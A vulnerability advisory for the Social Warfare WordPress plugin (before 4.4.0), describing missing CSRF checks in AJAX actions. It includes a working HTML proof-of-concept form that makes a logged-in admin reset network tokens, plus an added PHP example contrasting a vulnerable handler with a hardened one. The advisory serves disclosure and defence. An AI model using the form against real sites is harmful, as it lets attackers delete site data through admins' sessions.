wpexploit / Wpvulndb / WPEX-ID:7140ABF5-5966-4361-BD51-EE29D3071A30
Jan 05, 2023 - 12:00 a.m.

Social Warfare < 4.4.0 - Post Meta Deletion via CSRF

2023-01-05 00:00:00
wpvulndb
social warfare
post meta deletion
csrf
admin-ajax.php

EPSS: 0.001 (Low)
Percentile: 45.7%

The plugin does not have CSRF checks in some AJAX actions, allowing attackers to make a logged-in admin call them and delete arbitrary post meta, as well as reset access tokens related to network, via CSRF attacks.

<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
    <input type="text" name="action" value="swp_delete_network_tokens">
    <input type="text" name="network" value="42">
    <input type="submit" name="submit" value="submit">
</form>
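
The missing check described above, shown as an added example that is not code from the advisory or from the plugin: a hypothetical WordPress AJAX handler without a CSRF check beside a hardened form of it. Only the action name `swp_delete_network_tokens` and the `network` field come from the form above; the function names, option name and nonce action are assumptions.

```php
<?php
// Added example: hypothetical handlers, not Social Warfare's source code.
// Assumed names: example_* functions, the example_tokens_* option, the nonce action.

// Pattern the advisory describes: the handler relies on the session cookie alone,
// so a cross-site form POST submitted by a logged-in admin's browser is accepted.
function example_delete_network_tokens_unchecked() {
    $network = sanitize_key( wp_unslash( $_POST['network'] ?? '' ) );
    delete_option( 'example_tokens_' . $network ); // state change, no CSRF check
    wp_send_json_success();
}

// Hardened form: nonce check, then capability check, then the state change.
function example_delete_network_tokens() {
    // Ends the request with a 403 unless the 'nonce' field holds a valid
    // nonce for this action, issued to the current user.
    check_ajax_referer( 'example_delete_network_tokens', 'nonce' );

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    $network = sanitize_key( wp_unslash( $_POST['network'] ?? '' ) );
    if ( '' === $network ) {
        wp_send_json_error( array( 'message' => 'Missing network' ), 400 );
    }

    delete_option( 'example_tokens_' . $network );
    wp_send_json_success();
}
add_action( 'wp_ajax_swp_delete_network_tokens', 'example_delete_network_tokens' );

// The admin screen that legitimately triggers the action embeds the nonce,
// which a third-party page cannot read or predict.
function example_render_reset_form() {
    ?>
    <form action="<?php echo esc_url( admin_url( 'admin-ajax.php' ) ); ?>" method="POST">
        <input type="hidden" name="action" value="swp_delete_network_tokens">
        <input type="hidden" name="network" value="42">
        <?php wp_nonce_field( 'example_delete_network_tokens', 'nonce' ); ?>
        <input type="submit" value="Reset tokens">
    </form>
    <?php
}
```

When auditing a plugin for this class of bug, list every `wp_ajax_*` registration and confirm each state-changing callback performs both a nonce check and a capability check before acting.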
